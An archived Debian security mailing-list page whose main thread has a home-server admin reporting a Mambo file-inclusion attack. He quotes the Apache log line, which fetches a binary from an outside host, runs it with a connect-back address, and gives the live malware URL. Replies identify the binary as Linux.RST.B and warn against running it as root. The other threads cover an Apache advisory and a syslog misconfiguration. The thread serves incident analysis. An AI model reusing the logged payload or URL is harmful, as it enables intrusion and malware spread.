> As I patched mambo against recent "register global" attack and my /tmp
> is mount noexec, the attack doesn't exploit anything.
> 
> However, I curiously downloaded this sexy executable to have a closer look.
> 
> - ---cut---
> backup:/home/qmb# ./sexy -h
> ./sexy  
> - ---cut---

Never run apps like this as root.  Bad bad idea.

If you want more information about this tool, google for "Linux.RST.B"
or "Unix/RST.B".

cut---
$ f-prot sexy
Virus scanning report  -  23 January 2006 @ 4:21

F-PROT ANTIVIRUS
Program version: 4.6.5
Engine version: 3.16.13

VIRUS SIGNATURE FILES
SIGN.DEF created 13 January 2006
SIGN2.DEF created 13 January 2006
MACRO.DEF created 13 January 2006

Search: sexy
Action: Report only
Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER

/tmp/sexy  Infection: Unix/RST.B

Results of virus scanning:

Files: 1
MBRs: 0
Boot sectors: 0
Objects scanned: 1
Infected: 1
Suspicious: 0
Disinfected: 0
Deleted: 0
Renamed: 0

Time: 0:00
--end--


--cut--
$ clamscan sexy
sexy: Linux.RST.B FOUND

--- SCAN SUMMARY ---
Known viruses: 35671
Engine version: 0.88
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.01 MB
Time: 0.903 sec (0 m 0 s)
--end--



> 
> This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
> used to make rsync backups of LAN hosts to usb hds.
> 
> Unfortunately, I was that curious, that I decided to strace it (in spite
> I hardly understand strace):
> 
> - ---cut---
> backup:/home/qmb# strace ./sexy
> execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
> uname({sys="Linux", node="backup", ...}) = 0
> brk(0)  = 0x804a000
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> - -1, 0) = 0xb7f13000
> access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.cache", O_RDONLY)  = 3
> fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
> old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
> close(3)= 0
> access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
> directory)
> open("/lib/tls/libc.so.6", O_RDONLY)= 3
> read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
> 512) = 512
> fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
> old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xb7dd6000
> old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED,
> 3, 0x129000) = 0xb7f0
> old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
> MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
> close(3)= 0
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> - -1, 0) = 0xb7dd5000
> set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
> limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
> limit_in_pages:1, seg_not_present:0, useable:1}) = 0
> munmap(0xb7f0b000, 30780)   = 0
> fork()  = 11935
> fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
> mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
> 0) = 0xb7f12000
> write(1, "./sexy  \n", 21./sexy  
> )  = 21
> munmap(0xb7f12000, 4096)= 0
> exit_group(2)   = ?
> - ---cut---
> 
> After this run the box was hardly damaged:
> 
> - - It insists on bringing its NIC to promiscuous mode
> - - ls, grep, gunzip (probably others, too) just give a segmentation
>   fault
> 
> I tried to investigate further:
> 
> - - tcpdump doesn't show any traffic in the net that shouldn't be there
> - - ps a

Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Michael Loftis



--On January 23, 2006 8:31:40 AM +0100 Maik Holtkamp 
<[EMAIL PROTECTED]> wrote:



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

yesterday morning I found a strange entry in my apache log files (debian
sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
Server, just serving my Family and some good friends (normally).

- ---cut---
132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%
20212.20
3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20
YYY;echo|  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)" - ---cut---

As I patched mambo against recent "register global" attack and my /tmp
is mount noexec, the attack doesn't exploit anything.

However, I curiously downloaded this sexy executable to have a closer
look.

- ---cut---
backup:/home/qmb# ./sexy -h
./sexy  
- ---cut---


Firstly, don't ever download and run untrusted code as root, especially 
when it's obviously an exploit attempt, unless you run it on an unconnected 
box you're prepared to scrap afterwards.  God knows what the code will do 
to your system.


This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
used to make rsync backups of LAN hosts to usb hds.

Unfortunately, I was that curious, that I decided to strace it (in spite
I hardly understand strace):

- ---cut---
backup:/home/qmb# strace ./sexy
execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
uname({sys="Linux", node="backup", ...}) = 0
brk(0)  = 0x804a000
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7f13000
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY)  = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
close(3)= 0
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/lib/tls/libc.so.6", O_RDONLY)= 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xb7dd6000 old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f0
old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
close(3)= 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7dd5000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xb7f0b000, 30780)   = 0
fork()  = 11935
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f12000
write(1, "./sexy  \n", 21./sexy  
)  = 21
munmap(0xb7f12000, 4096)= 0
exit_group(2)   = ?
- ---cut---

After this run the box was hardly damaged:

- - It insists on bringing its NIC to promiscuous mode
- - ls, grep, gunzip (probably others, too) just give a segmentation
  fault

I tried to investigate further:

- - tcpdump doesn't show any traffic in the net that shouldn't be there
- - ps ax listed only known processes, all where found in /proc, too
- - Top doesn't show anything strange
- - netstat -tulpen doesn't list any ports listening

Trying rebooting failed totally. It tried to run a lot of grep processes
that didn't run etc.

It took me 2 hours to return to a normal state with this box (booting
knoppix, backup of corrupted /var, blanking the disc, restoring the
backup of the night before).

In spite I am not that familiar with strace and no coder, I suppose that
the program "sexy" damaged the linker (open ld.so.cache) and would have
tried to open a ptty on the IP/port given on the command line (As I did
not give any command line arguments, this failed). Probably the guy/bot
on the other end would have exchanged some libs in this session to
install the real rootkit on the box.

Right?


Not having the binary and not really having time to look at it, it's 
probably just straight up attempting to infect your machine, and that it 
very clearly succeeded in doing.  It didn't however succeed in hiding 
itself, as evidenced by your segfaults.  You&#

Strange Apache log and mambo security - sexy executable

2006-01-22 Thread Maik Holtkamp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

yesterday morning I found a strange entry in my apache log files (debian
sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
Server, just serving my Family and some good friends (normally).

- ---cut---
132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
 HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
- ---cut---

As I patched mambo against recent "register global" attack and my /tmp
is mount noexec, the attack doesn't exploit anything.

However, I curiously downloaded this sexy executable to have a closer look.

- ---cut---
backup:/home/qmb# ./sexy -h
./sexy  
- ---cut---

This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
used to make rsync backups of LAN hosts to usb hds.

Unfortunately, I was that curious, that I decided to strace it (in spite
I hardly understand strace):

- ---cut---
backup:/home/qmb# strace ./sexy
execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
uname({sys="Linux", node="backup", ...}) = 0
brk(0)  = 0x804a000
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7f13000
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY)  = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
close(3)= 0
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/lib/tls/libc.so.6", O_RDONLY)= 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xb7dd6000
old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED,
3, 0x129000) = 0xb7f0
old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
close(3)= 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7dd5000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xb7f0b000, 30780)   = 0
fork()  = 11935
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f12000
write(1, "./sexy  \n", 21./sexy  
)  = 21
munmap(0xb7f12000, 4096)= 0
exit_group(2)   = ?
- ---cut---

After this run the box was hardly damaged:

- - It insists on bringing its NIC to promiscuous mode
- - ls, grep, gunzip (probably others, too) just give a segmentation
  fault

I tried to investigate further:

- - tcpdump doesn't show any traffic in the net that shouldn't be there
- - ps ax listed only known processes, all where found in /proc, too
- - Top doesn't show anything strange
- - netstat -tulpen doesn't list any ports listening

Trying rebooting failed totally. It tried to run a lot of grep processes
that didn't run etc.

It took me 2 hours to return to a normal state with this box (booting
knoppix, backup of corrupted /var, blanking the disc, restoring the
backup of the night before).

In spite I am not that familiar with strace and no coder, I suppose that
the program "sexy" damaged the linker (open ld.so.cache) and would have
tried to open a ptty on the IP/port given on the command line (As I did
not give any command line arguments, this failed). Probably the guy/bot
on the other end would have exchanged some libs in this session to
install the real rootkit on the box.

Right?

Though I already invested some time (restoring the host backup), I would
be pleased to understand what happened more detailed so any clue is
appreciated.

If somebody wants to have a closer look at the binary, I think you can
still get at:

http://212.203.97.120/sexy

Does it make any sense to complain at the abuse teams of the involved
IPs given in the apache log?

TIA.

BTW: The name of the binary "sexy", doesn't make it easier to STFW :(

PS: Sorry, to all I bothered when sending this message to the private
list ([EMAIL PROTECTED]) first.

- --
- - maik
-BEGIN PGP SIGNATURE-
Version: Gn

Re: [SECURITY] [DSA 803-1] New Apache packages fix HTTP request smuggling

2005-09-08 Thread joaopaulo
atualizei:
apache, apache-common e apache-utils

jp(sem assinatura).

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> -
> --
> Debian Security Advisory DSA 803-1 [EMAIL PROTECTED]
> http://www.debian.org/security/ Martin Schulze
> September 8th, 2005 http://www.debian.org/security/faq
> -
> ------
>
> Package: apache
> Vulnerability  : programming error
> Problem type   : remote
> Debian-specific: no
> CVE ID : CAN-2005-2088
> Debian Bug : 322607
>
> A vulnerability has been discovered in the Apache web server.  When it
> is acting as an HTTP proxy, it allows remote attackers to poison the
> web cache, bypass web application firewall protection, and conduct
> cross-site scripting attacks, which causes Apache to incorrectly
> handle and forward the body of the request.
>
> For the old stable distribution (woody) this problem has been fixed in
> version 1.3.26-0woody7.
>
> For the stable distribution (sarge) this problem has been fixed in
> version 1.3.33-6sarge1.
>
> For the unstable distribution (sid) this problem has been fixed in
> version 1.3.33-8.
>
> We recommend that you upgrade your Apache package.
>
>
> Upgrade Instructions
> - 
>
> wget url
> will fetch the file for you
> dpkg -i file.deb
> will install the referenced file.
>
> If you are using the apt-get package manager, use the line for
> sources.list as given below:
>
> apt-get update
> will update the internal database
> apt-get upgrade
> will install corrected packages
>
> You may use an automated update by adding the resources from the
> footer to the proper configuration.
>

> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.1 (GNU/Linux)
>
> iD8DBQFDH9OSW5ql+IAeqTIRAo8cAJ9wG0wUOQcSBszrarKnqWOs9IlwTACePEcf
> cDGL/fke9UfFWxj7FBIzBwM=
> =vhXI
> -END PGP SIGNATURE-



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: [SECURITY] [DSA 803-1] New Apache packages fix HTTP request smuggling

2005-09-08 Thread Martin Schmidt
Moin,

wir haben Version  Apache/2.0.44 im Einsatz, also diesbezüglich kein
Handlungsbedarf.

---
Martin Schmidt - [EMAIL PROTECTED]
Hamburger Pensionsverwaltung eG

MS> Umgeleitet von He:
MS> ich beobachte die Security-Liste für debian. Dabei bin ich über diesen
MS> Fehler bzw. Fix gefallen. Ist der Fehler auf unseren Systemen unter
MS> Suse gefixed?

MS> -BEGIN PGP SIGNED MESSAGE-
MS> Hash: SHA1

MS> - --
MS> Debian Security Advisory DSA 803-1 [EMAIL PROTECTED]
MS> http://www.debian.org/security/ Martin Schulze
MS> September 8th, 2005 http://www.debian.org/security/faq
MS> - ------

>>Package: apache
MS> Vulnerability  : programming error
>>Problem type   : remote
>>Debian-specific: no
>>CVE ID : CAN-2005-2088
MS> Debian Bug : 322607

MS> A vulnerability has been discovered in the Apache web server.  When it
MS> is acting as an HTTP proxy, it allows remote attackers to poison the
MS> web cache, bypass web application firewall protection, and conduct
MS> cross-site scripting attacks, which causes Apache to incorrectly
MS> handle and forward the body of the request.

MS> For the old stable distribution (woody) this problem has been fixed in
MS> version 1.3.26-0woody7.

MS> For the stable distribution (sarge) this problem has been fixed in
MS> version 1.3.33-6sarge1.

MS> For the unstable distribution (sid) this problem has been fixed in
MS> version 1.3.33-8.

MS> We recommend that you upgrade your Apache package.


MS> Upgrade Instructions
MS> - 

MS> wget url
MS> will fetch the file for you
MS> dpkg -i file.deb
MS> will install the referenced file.

MS> If you are using the apt-get package manager, use the line for
MS> sources.list as given below:

MS> apt-get update
MS> will update the internal database
MS> apt-get upgrade
MS> will install corrected packages

MS> You may use an automated update by adding the resources from the
MS> footer to the proper configuration.


MS> Debian GNU/Linux 3.0 alias woody
MS> - 

MS>   Source archives:

MS> 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody7.dsc
MS>   Size/MD5 checksum:  668 498fa0b608affe5f54ca6f39c09ee842
MS> 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody7.diff.gz
MS>   Size/MD5 checksum:   301515 9aca1a8cc1bb9d2cf016dd59f66e318d
MS> 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26.orig.tar.gz
MS>   Size/MD5 checksum:  2586182 5cd778bbe6906b5ef39dbb7ef801de61

MS>   Architecture independent components:

MS> 
http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.26-0woody7_all.deb
MS>   Size/MD5 checksum:  1022808 3c34206949d744c5131401fb37bd80c4

MS>   Alpha architecture:

MS> 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody7_alpha.deb
MS>   Size/MD5 checksum:   395714 420933ad19e04518f105c7c10a6bdca3
MS> 
http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody7_alpha.deb
MS>   Size/MD5 checksum:   926264 af2983a29e494c582e40bd9e3bd6d5f3
MS> 
http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody7_alpha.deb
MS>   Size/MD5 checksum:   714110 4a531cd2954b066755b68b9be16ace01

MS>   ARM architecture:

MS> 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody7_arm.deb
MS>   Size/MD5 checksum:   361344 cec90195145f015edfbfc35313c7f6cc
MS> 
http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody7_arm.deb
MS>   Size/MD5 checksum:   839138 bc71db85fa4eff02aa30caaa757a5f2f
MS> 
http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody7_arm.deb
MS>   Size/MD5 checksum:   544586 62191863ffd4f96497754f4b915a3c50

MS>   Intel IA-32 architecture:

MS> 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody7_i386.deb
MS>   Size/MD5 checksum:   350294 fba3a1bc003f12e9ee66bd82151c8a81
MS> 
http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody7_i386.deb
MS>   Size/MD5 checksum:   812910 2e7fd26fa78f0a6b908299a169bd602b
MS> 
http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody7_i386.deb
MS>   Size/MD5 checksum:   535754 d5868a7f4e0dea7465bedfabaebeeab4

MS>   Intel IA-64 architecture:

MS> 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody7_ia64.deb
MS>

Re: Re: found this in my /var/log/apache/access.log

2005-08-10 Thread fabrice maine



Hi anyone,
 
iam french, and i work on Microsoft Xppro, i have a 
Apache server and i always fall on the same request
but it's always in 400 or 404... so, nothin' 
special to be afraid about, just to inform people that this sort of request 
exist.
 
See you
Fab


Re: Strange kernel log in apache log

2005-04-16 Thread Andreas Gredler
On Fri, Apr 15, 2005 at 10:35:23PM +0200, HubiX wrote:
 
> What I need : Does anyone know a good live cd, who can made detection 
> intrusions, in 32M of RAM ( WITHOUT X11 ).

Take a look at GRML
http://www.grml.org

It should run with 32MB and has a lot of security tools.
If it doesn't run good enough, please send me a mail. We could then try
to speed it up.

greets Jimmy

-- 
 Andreas "Jimmy" Gredler 
   ,'"`. http://www.g-tec.co.at/ | [EMAIL PROTECTED]
  (  grml.org -» Linux for texttool-users and sysadmins
   `._,  http://www.grml.org/| [EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Strange kernel log in apache log

2005-04-15 Thread martin f krafft
also sprach Brian Brazil <[EMAIL PROTECTED]> [2005.04.16.0121 +0200]:
> *.*   /var/log/apache/access.log
> *.*   /var/log/apache/error.log
> *.*   /var/log/boa/access_log
> *.*   /var/log/boa/error_log

oh wow. htf could i have missed those. sorry.

-- 
Please do not send copies of list mail to me; I read the list!
 
 .''`. martin f. krafft <[EMAIL PROTECTED]>
: :'  :proud Debian developer, admin, user, and author
`. `'`
  `-  Debian - when you have better things to do than fixing a system
 
Invalid/expired PGP subkeys? Use subkeys.pgp.net as keyserver!
 
"nullum magnum ingenium sine mixtura dementiae fuit."
 -- seneca


signature.asc
Description: Digital signature


Re: Strange kernel log in apache log

2005-04-15 Thread Brian Brazil
On Sat, Apr 16, 2005 at 12:04:33AM +0200, HubiX wrote:
> martin f krafft a écrit :
> >
> >Can you put the file on the web somewhere (http://rafb.net/paste)
> >and show us the link?
> 
> OK, here my /etc/syslog.conf : http://rafb.net/paste/results/vu91Zw34.html

Last 4 lines:
*.* /var/log/apache/access.log
*.* /var/log/apache/error.log
*.* /var/log/boa/access_log
*.* /var/log/boa/error_log

These put ALL system and kernel log messages into the apache logs.
I suggest removing these lines and restarting sysklogd.

Brian

-- 
Website: http://netsoc.tcd.ie/~bbrazil


pgpqz8wJ1tqd7.pgp
Description: PGP signature


Re: Strange kernel log in apache log

2005-04-15 Thread HubiX
martin f krafft a Ãcrit :
Please honour my request not to CC me on list messages.
OUPS, SORRY ! Thunderbird ?
My syslog write in apache log, then the apache log contain all my kernel

Did you modify /etc/syslog.conf ?
No, but I hav a new file named /etc/syslog.conf.lock who contain only 26898
Can you put the file on the web somewhere (http://rafb.net/paste)
and show us the link?
OK, here my /etc/syslog.conf : http://rafb.net/paste/results/vu91Zw34.html

I say also, partitions for usr is mounted in read only mode, binary
directories and executables are immutables, like /etc.

Neither of those are security precautions, really.
It's in an official debian security guide ( txt format )

A: Knoppix needs lots of RAM and a x86 architecture (Intel, AMD,
etc.). You might get it running on an old 486 with at least 48MB RAM.,
but don't expect much (like gui). You're better off with a pentium
class machine with at least 64-96MB RAM. Knoppix-STD is very reliant
on RAM, the more the better.

So why not just add more RAM?
Because I dont have any free place (bank?), and I have only 8M of ram 
(sticks?). 4x8M :-(

I hope to find a small boot disk, with some command line tools to check 
the system integrity. 32M is huge for this.
My 32M system has apache, apache-ssl, courrier-imapd-ssl, 
courrier-pop-ssl, exim, thttpd, mysql and rarely swap.

I have developp some open source projects on, and I need all of this...
Thank for your patience.
--
Rodier AndrÃ
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Re: Strange kernel log in apache log

2005-04-15 Thread martin f krafft
Please keep this post on the list.

also sprach HubiX <[EMAIL PROTECTED]> [2005.04.16.0002 +0200]:
> No, but I hav a new file named /etc/syslog.conf.lock who contain only 26898

I have never seen this.

> OK, here my /etc/syslog.conf : http://rafb.net/paste/results/vu91Zw34.html

Looks okay.

> I say also, partitions for usr is mounted in read only mode, binary
> directories and executables are immutables, like /etc.
> 
> Neither of those are security precautions, really.
> 
> It's in an official debian security guide ( txt format )

It's just another brick in the wall.

> Because I dont have any free place (bank?), and I have only 8M of ram
> (sticks?). 4x8M :-(

Oh that sucks.

> I hope to find a small boot disk, with some command line tools to check the
> system integrity. 32M is huge for this.

Or: take the harddrive into another computer.

> My 32M system has apache, apache-ssl, courrier-imapd-ssl, courrier-pop-ssl,
> exim, thttpd, mysql and rarely swap.

I know, been there done that. It also takes 2 hours to computer
`apt-get update`.

-- 
 .''`. martin f. krafft <[EMAIL PROTECTED]>
: :'  :proud Debian developer, admin, user, and author
`. `'`
  `-  Debian - when you have better things to do than fixing a system
 
Invalid/expired PGP subkeys? Use subkeys.pgp.net as keyserver!
 
"a woman is like your shadow;
 follow her, she flies;
 fly from her, she follows."
-- sébastien-roch-nicolas chamfort


signature.asc
Description: Digital signature


Re: Strange kernel log in apache log

2005-04-15 Thread HubiX




martin f krafft a ÃcritÂ:
Please honour my request not to CC me on list messages.
  
OUPS, SORRY ! Thunderbird ?
 
  My syslog write in apache log, then the
apache log contain all my kernel 

  
Did you modify /etc/syslog.conf ?
  
No, but I hav a new file named /etc/syslog.conf.lock who
contain only 26898


Can you put the file on the web somewhere (http://rafb.net/paste)
and show us the link?
  
OK, here my /etc/syslog.conf :
http://rafb.net/paste/results/vu91Zw34.html

  
  I say also, partitions for usr is mounted
in read only mode, binary 
directories and executables are immutables, like /etc.


Neither of those are security precautions, really.
  
It's in an official debian security guide ( txt format )

  
  
A: Knoppix needs lots of RAM and a x86
architecture (Intel, AMD, 
etc.). You might get it running on an old 486 with at least 48MB RAM., 
but don't expect much (like gui). You're better off with a pentium 
class machine with at least 64-96MB RAM. Knoppix-STD is very reliant 
on RAM, the more the better.
  
  

So why not just add more RAM?
  
Because I dont have any free place (bank?), and I have only 8M of
ram (sticks?). 4x8M :-(

I hope to find a small boot disk, with some command line tools to check
the system integrity. 32M is huge for this. 
My 32M system has apache, apache-ssl, courrier-imapd-ssl,
courrier-pop-ssl, exim, thttpd, mysql and rarely swap.

I have developp some open source projects on, and I need all of this...

Thank for your patience.

--
Rodier AndrÃ






Re: Strange kernel log in apache log

2005-04-15 Thread martin f krafft
Please honour my request not to CC me on list messages.

> My syslog write in apache log, then the apache log contain all my kernel 

Did you modify /etc/syslog.conf ?

Can you put the file on the web somewhere (http://rafb.net/paste)
and show us the link?

> I say also, partitions for usr is mounted in read only mode, binary 
> directories and executables are immutables, like /etc.

Neither of those are security precautions, really.

> >A: Knoppix needs lots of RAM and a x86 architecture (Intel, AMD, 
> >etc.). You might get it running on an old 486 with at least 48MB RAM., 
> >but don't expect much (like gui). You're better off with a pentium 
> >class machine with at least 64-96MB RAM. Knoppix-STD is very reliant 
> >on RAM, the more the better.

So why not just add more RAM?

-- 
Please do not send copies of list mail to me; I read the list!
 
 .''`. martin f. krafft <[EMAIL PROTECTED]>
: :'  :proud Debian developer, admin, user, and author
`. `'`
  `-  Debian - when you have better things to do than fixing a system
 
Invalid/expired PGP subkeys? Use subkeys.pgp.net as keyserver!
 
hi! i'm a .signature virus!
copy me into your ~/.signature to help me spread!


signature.asc
Description: Digital signature


Re: Strange kernel log in apache log

2005-04-15 Thread HubiX
martin f krafft a Ãcrit :
also sprach HubiX <[EMAIL PROTECTED]> [2005.04.15.2235 +0200]:
 

I have a strange event on my machine : the kerneld write to apache 
access log ( /var/log/apache/access.log ).
Apache is only accessiblme from my network.
   

What's the log message?
 

What I need : Does anyone know a good live cd, who can made detection 
intrusions, in 32M of RAM ( WITHOUT X11 ).
   

check out Knoppix STD
 http://www.knoppix-std.org/
You can boot it text-only. Not sure if it can run with only 32 M of
RAM.
 

Thanks,
My syslog write in apache log, then the apache log contain all my kernel 
messages I have verified inodes, config files, and make an e2fsck.
I say also, partitions for usr is mounted in read only mode, binary 
directories and executables are immutables, like /etc.

knoppix-std : http://www.knoppix-std.org/faq.html :
A: Knoppix needs lots of RAM and a x86 architecture (Intel, AMD, 
etc.). You might get it running on an old 486 with at least 48MB RAM., 
but don't expect much (like gui). You're better off with a pentium 
class machine with at least 64-96MB RAM. Knoppix-STD is very reliant 
on RAM, the more the better.

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Re: Strange kernel log in apache log

2005-04-15 Thread martin f krafft
also sprach HubiX <[EMAIL PROTECTED]> [2005.04.15.2235 +0200]:
> I have a strange event on my machine : the kerneld write to apache 
> access log ( /var/log/apache/access.log ).
> Apache is only accessiblme from my network.

What's the log message?

> What I need : Does anyone know a good live cd, who can made detection 
> intrusions, in 32M of RAM ( WITHOUT X11 ).

check out Knoppix STD

  http://www.knoppix-std.org/

You can boot it text-only. Not sure if it can run with only 32 M of
RAM.

-- 
Please do not send copies of list mail to me; I read the list!
 
 .''`. martin f. krafft <[EMAIL PROTECTED]>
: :'  :proud Debian developer, admin, user, and author
`. `'`
  `-  Debian - when you have better things to do than fixing a system
 
Invalid/expired PGP subkeys? Use subkeys.pgp.net as keyserver!
 
dies ist eine manuell generierte email. sie beinhaltet
tippfehler und ist auch ohne großbuchstaben gültig.


signature.asc
Description: Digital signature


Strange kernel log in apache log

2005-04-15 Thread HubiX
Hello all,
I'm affraid. First, I hope you understand my poor english :-)
I have a 24/7 old PC(32M), behind an hardware firewall/router ( freebox )
My server *as fixed IP* and is only accessible by www(thttpd), imaps and 
pops (courrier), ssh and smtp.
This is a debian woody, recently installed.

I have a strange event on my machine : the kerneld write to apache 
access log ( /var/log/apache/access.log ).
Apache is only accessiblme from my network.

chkrootkit dont find any rootkit.
What I need : Does anyone know a good live cd, who can made detection 
intrusions, in 32M of RAM ( WITHOUT X11 ).

Thanks.
--
Rodier AndrÃ
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


